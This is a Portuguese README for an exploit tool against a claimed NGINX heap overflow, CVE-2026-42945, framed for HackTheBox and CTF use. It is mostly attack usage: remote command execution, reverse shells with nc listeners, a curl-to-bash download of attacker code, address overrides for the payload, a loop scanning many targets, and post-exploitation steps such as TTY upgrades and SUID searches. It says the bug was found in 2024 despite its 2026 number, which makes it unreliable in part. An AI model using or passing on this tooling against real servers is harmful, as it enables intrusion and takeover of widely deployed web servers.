
exploit para CVE-2026-42945
Exploit independente para a vulnerabilidade de estouro de buffer heap do NGINX descoberta em 2024. Esta versão é otimizada para ambientes HackTheBox e CTF onde você não pode configurar contêineres Docker.
CVE-2026-42945 é um estouro de buffer heap crítico no ngx_http_rewrite_module do NGINX que existe desde 2008 (versão 0.6.27). O bug ocorre quando:
rewrite contém ? na substituição (define is_args = 1)set captura parte da URIis_args = 0)is_args = 1)# Python 3.6+
sudo apt update
sudo apt install python3 netcat-openbsd
# Nenhum pacote Python adicional necessário - usa apenas stdlib!
python3 nginx_rift_htb.py --target 10.10.11.x --check-only
Isso irá:
/api/python3 nginx_rift_helper.py --target 10.10.11.x --all
Isso realiza:
Executar um comando:
python3 nginx_rift_htb.py --target 10.10.11.x --port 80 --cmd "id"
Obter um shell reverso:
# Iniciar o listener primeiro (em outro terminal)
nc -lvnp 4444
# Executar o exploit
python3 nginx_rift_htb.py --target 10.10.11.x --shell --lhost 10.10.14.5 --lport 4444
# Executar o comando 'id'
python3 nginx_rift_htb.py --target 10.10.11.23 --cmd "id"
# Executar 'whoami'
python3 nginx_rift_htb.py --target 10.10.11.23 --cmd "whoami"
# Ler /etc/passwd
python3 nginx_rift_htb.py --target 10.10.11.23 --cmd "cat /etc/passwd"
# Terminal 1: Iniciar listener
nc -lvnp 4444
# Terminal 2: Executar exploit
python3 nginx_rift_htb.py \
--target 10.10.11.23 \
--shell \
--lhost 10.10.14.5 \
--lport 4444 \
--verbose
python3 nginx_rift_htb.py \
--target 10.10.11.23 \
--cmd "id" \
--heap-base 0x555555659000 \
--libc-base 0x7ffff77ba000
python3 nginx_rift_htb.py \
--target 10.10.11.23 \
--port 8080 \
--cmd "curl http://10.10.14.5/shell.sh | bash" \
--tries 20 \
--verbose
ngx_pool_cleanup_s/api/ com uma URI especialmente criada que transbordará ao ser escapadasystem() com nosso comandoO exploit assume que ASLR está desativado ou que você conhece os endereços. No HTB:
Se o ASLR estiver ativado, você pode precisar:
A configuração vulnerável requer:
location ~ ^/api/(.*)$ {
rewrite ^/api/(.*)$ /internal?migrated=true;
set $original_endpoint $1;
}
/api/, /admin/, /internal/Possíveis razões:
ASLR está ativado - Endereços são aleatorizados
Versão diferente da libc - system() em offset diferente
--verboseVersão não vulnerável - Versão corrigida ou configuração diferente
WAF/IDS bloqueando - Controles de segurança em vigor
Endpoint errado - Não está usando combinação rewrite+set
Sempre use --verbose para depuração:
python3 nginx_rift_htb.py --target 10.10.11.23 --cmd "id" --verbose
Isso mostra:
# Encontre seu IP tun0
ip addr show tun0 | grep inet
# Use este IP para --lhost
python3 nginx_rift_htb.py --target TARGET --shell --lhost SEU_IP_TUN0 --lport 4444
Assim que obtiver acesso inicial:
# Atualizar para TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Colocar em segundo plano e definir terminal
Ctrl+Z
stty raw -echo; fg
export TERM=xterm
# Verificar usuário atual
id
whoami
# Procurar flags
find / -name "user.txt" 2>/dev/null
find / -name "root.txt" 2>/dev/null
# Verificar permissões sudo
sudo -l
# Verificar binários SUID
find / -perm -4000 2>/dev/null
Se precisar personalizar o payload:
# Edite a função make_body() em nginx_rift_htb.py
# Ajuste BODY_LEN para diferentes configurações
# Modifique a string de overflow (349 'A' + 969 '+')
# Crie uma lista de alvos
cat targets.txt
10.10.11.23
10.10.11.24
10.10.11.25
# Teste cada um
while read target; do
echo "Testando $target"
python3 nginx_rift_htb.py --target $target --check-only
done < targets.txt
#!/bin/bash
TARGET=$1
LHOST=$2
echo "[*] Iniciando listener..."
nc -lvnp 4444 &
LISTENER_PID=$!
sleep 2
echo "[*] Executando exploit..."
python3 nginx_rift_htb.py \
--target $TARGET \
--shell \
--lhost $LHOST \
--lport 4444 \
--verbose
wait $LISTENER_PID
location ~ ^/api/(.*)$ {
rewrite ^/api/(.*)$ /internal?migrated=true; # Define is_args=1
set $original_endpoint $1; # Aloca com base em is_args=0
}